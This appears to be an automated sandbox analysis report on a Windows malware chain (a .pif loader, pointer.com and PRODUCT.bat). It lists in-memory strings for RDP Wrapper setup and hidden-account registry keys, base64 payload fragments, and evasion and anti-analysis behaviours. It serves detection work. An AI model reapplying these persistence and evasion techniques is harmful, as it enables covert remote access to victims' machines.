Source: dbkyovyK.pif, 0000000E.00000003.1719410904.000000002FDE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: Kyvoykbd.PIF, 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: Kyvoykbd.PIF, 00000017.00000002.1846860261.00000000123A7000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 00000019.00000001.1834966037.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000001D.00000002.1918637421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: dbkyovyK.pif, 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: dbkyovyK.pif, 0000001D.00000001.1902763804.0000000000400000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\Public\Libraries\dbkyovyK.pif

File opened: C:\Users\Public\Libraries\dbkyovyK.pif:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\Public\pointer.com	Code function: 8_2_02D521F8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	8_2_02D521F8
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D3AE94 IsIconic,GetWindowPlacement,GetWindowRect,	8_2_02D3AE94
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D50FC4 IsIconic,GetCapture,	8_2_02D50FC4
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D63148 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	8_2_02D63148
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D518CC IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	8_2_02D518CC
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D63878 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,	8_2_02D63878
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D6393C IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,	8_2_02D6393C
Source: C:\Users\Public\pointer.com	Code function: 8_2_02D5FC84 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	8_2_02D5FC84
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E921F8 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	26_2_02E921F8
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E90FC4 IsIconic,GetCapture,	26_2_02E90FC4
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA3148 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	26_2_02EA3148
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E918CC IsIconic,SetWindowPos,GetWindowPlacement,	26_2_02E918CC
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA3878 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	26_2_02EA3878
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02EA393C IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	26_2_02EA393C
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: 26_2_02E9FC84 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,	26_2_02E9FC84

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D687CC GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_02D687CC

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Allocates many large memory junks

Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2D10000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2D11000 memory commit 240427008	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2D79000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2DAA000 memory commit 241016832	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2EA2000 memory commit 240013312	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2EA5000 memory commit 240029696	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2E50000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2E51000 memory commit 240427008	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2EB9000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2EEA000 memory commit 241016832	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2FE2000 memory commit 240013312	Jump to behavior
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Memory allocated: 2FE5000 memory commit 240029696	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2D10000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2D11000 memory commit 240427008	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2D79000 memory commit 240005120	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2DAA000 memory commit 241016832	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2EA2000 memory commit 240013312	Jump to behavior
Source: C:\Users\Public\pointer.com	Memory allocated: 2EA5000 memory commit 240029696	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_14-56654

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE PING -n 2 127.0.0.1			Jump to behavior

Source: C:\Users\Public\pointer.com

Code function: 8_3_02C044FB rdtsc

8_3_02C044FB

Source: C:\Users\Public\pointer.com	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		8_2_02D62408
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		26_2_02EA2408

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,		14_2_004114F4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,		25_1_004114F4

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_14-56944

Source: C:\Users\Public\pointer.com	Dropped PE file which has not been started: C:\Users\Public\Libraries\truesight.sys			Jump to dropped file
Source: C:\Users\Public\pointer.com	Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe			Jump to dropped file

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_14-56545

Source: C:\Users\Public\pointer.com	API coverage: 7.4 %
Source: C:\Users\Public\Libraries\dbkyovyK.pif	API coverage: 5.1 %
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	API coverage: 5.4 %

Source: C:\Users\Public\Libraries\dbkyovyK.pif TID: 2120	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\dbkyovyK.pif TID: 7540	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Users\Public\Libraries\dbkyovyK.pif TID: 7692	Thread sleep count: 60 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\Public\pointer.com	Code function: 8_2_02D15C18 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	8_2_02D15C18
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	14_2_0040C293
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW,	14_2_00413C83
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	25_1_0040C293
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 25_1_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW,	25_1_00413C83

Source: C:\Users\Public\Libraries\dbkyovyK.pif

Code function: 14_2_00413DA4 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,lstrlenW,lstrcpyW,lstrlenW,

14_2_00413DA4

Source: dbkyovyK.pif, 0000000E.00000003.1719107858.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719410904.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000002.2903547119.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719205642.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000000E.00000003.1719504502.000000002FDEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
Source: Kyvoykbd.PIF, 00000017.00000003.1835151143.000000000076C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: dbkyovyK.pif, 00000019.00000003.1852299322.000000002FE04000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000003.1852496569.000000002FE05000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 00000019.00000003.1852440428.000000002FE04000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000003.1918274341.0000000023FB4000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000003.1918091307.0000000023FB4000.00000004.00000020.00020000.00000000.sdmp, dbkyovyK.pif, 0000001D.00000003.1918348514.0000000023FB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
Source: PRODUCT.bat	Binary or memory string: lVVVkJVVYZCVVWWQlVVpkJVVXZCVVb2NlVXZjZVVFY2VVV6ams3JusfDtsHgFS3P
Source: pointer.com, 00000008.00000002.1699425872.000000000075A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW]T
Source: PRODUCT.bat	Binary or memory string: w5jEw8nHxMHgFSG9mFVcYKmsvsOYxMPJx8TBgbqYVQW1mFViVV2YxMPJx8TByFVV
Source: certutil.exe, 00000003.00000003.1636949149.0000025999865000.00000004.00000020.00020000.00000000.sdmp, PRODUCT.bat	Binary or memory string: 8tRNeCaVEtTpkMxki/81EokddP/gSz7WJj7RqEmuczGGWE+hU9rAtHpU7dvRtdbK
Source: pointer.com, 00000008.00000002.1699425872.000000000075A000.00000004.00000020.00020000.00000000.sdmp, pointer.com, 00000008.00000002.1699425872.000000000070C000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 00000017.00000003.1835151143.00000000007B6000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, Kyvoykbd.PIF, 0000001A.00000003.1903375914.00000000006FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PRODUCT.bat	Binary or memory string: 1VVVVd6zxQdW9m2smlU9hGFSVOBF3siZ3rNhHJtduYyYVRuYllbgJIgn4Bg9kgFT

Source: C:\Users\Public\pointer.com	API call chain: ExitProcess graph end node	graph_8-54980
Source: C:\Users\Public\Libraries\dbkyovyK.pif	API call chain: ExitProcess graph end node	graph_14-56688
Source: C:\Users\Public\Libraries\dbkyovyK.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\dbkyovyK.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\dbkyovyK.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Kyvoykbd.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\pointer.com

Code function: 8_3_02C044FB rdtsc

8_3_02C044FB

Source: C:\Users\Public\pointer.com

Code function: 8_2_02D2FCE0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

8_2_02D2FCE0

Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0041E172 mov eax, dword ptr fs:[00000030h]	14_2_0041E172
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004143ED mov eax, dword ptr fs:[00000030h]	14_2_004143ED
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_004143F4 mov eax, dword ptr fs:[00000030h]	14_2_004143F4
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_0041471F mov eax, dword ptr fs:[00000030h]	14_2_0041471F
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B9B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3B9B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B9B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3B9B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B9B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3B9B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B9B6 mov eax, dword ptr fs:[00000030h]	14_2_39D3B9B6
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B93C mov eax, dword ptr fs:[00000030h]	14_2_39D3B93C
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BADF mov eax, dword ptr fs:[00000030h]	14_2_39D3BADF
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BADF mov eax, dword ptr fs:[00000030h]	14_2_39D3BADF
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3DACB mov ecx, dword ptr fs:[00000030h]	14_2_39D3DACB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3DACB mov ecx, dword ptr fs:[00000030h]	14_2_39D3DACB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3DACB mov ecx, dword ptr fs:[00000030h]	14_2_39D3DACB
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3DC2D mov ecx, dword ptr fs:[00000030h]	14_2_39D3DC2D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3DC2D mov ecx, dword ptr fs:[00000030h]	14_2_39D3DC2D
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BFBA mov eax, dword ptr fs:[00000030h]	14_2_39D3BFBA
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BFBA mov ecx, dword ptr fs:[00000030h]	14_2_39D3BFBA
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BEB3 mov eax, dword ptr fs:[00000030h]	14_2_39D3BEB3
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3BEB3 mov ecx, dword ptr fs:[00000030h]	14_2_39D3BEB3
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3FE00 mov ecx, dword ptr fs:[00000030h]	14_2_39D3FE00
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3FE00 mov ecx, dword ptr fs:[00000030h]	14_2_39D3FE00
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CE3130 mov ecx, dword ptr fs:[00000030h]	14_2_39CE3130
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CE3130 mov ecx, dword ptr fs:[00000030h]	14_2_39CE3130
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B3D9 mov eax, dword ptr fs:[00000030h]	14_2_39D3B3D9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B3D9 mov ecx, dword ptr fs:[00000030h]	14_2_39D3B3D9
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED3C2 mov eax, dword ptr fs:[00000030h]	14_2_39CED3C2
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3D395 mov ecx, dword ptr fs:[00000030h]	14_2_39D3D395
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3D395 mov ecx, dword ptr fs:[00000030h]	14_2_39D3D395
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B350 mov eax, dword ptr fs:[00000030h]	14_2_39D3B350
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B350 mov ecx, dword ptr fs:[00000030h]	14_2_39D3B350
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B2D1 mov eax, dword ptr fs:[00000030h]	14_2_39D3B2D1
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D3B2D1 mov ecx, dword ptr fs:[00000030h]	14_2_39D3B2D1
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D13260 mov ecx, dword ptr fs:[00000030h]	14_2_39D13260
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D13260 mov ecx, dword ptr fs:[00000030h]	14_2_39D13260
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39D135C0 mov eax, dword ptr fs:[00000030h]	14_2_39D135C0
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED554 mov eax, dword ptr fs:[00000030h]	14_2_39CED554
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
Source: C:\Users\Public\Libraries\dbkyovyK.pif	Code function: 14_2_39CED41E mov eax, dword ptr fs:[00000030h]	14_2_39CED41E
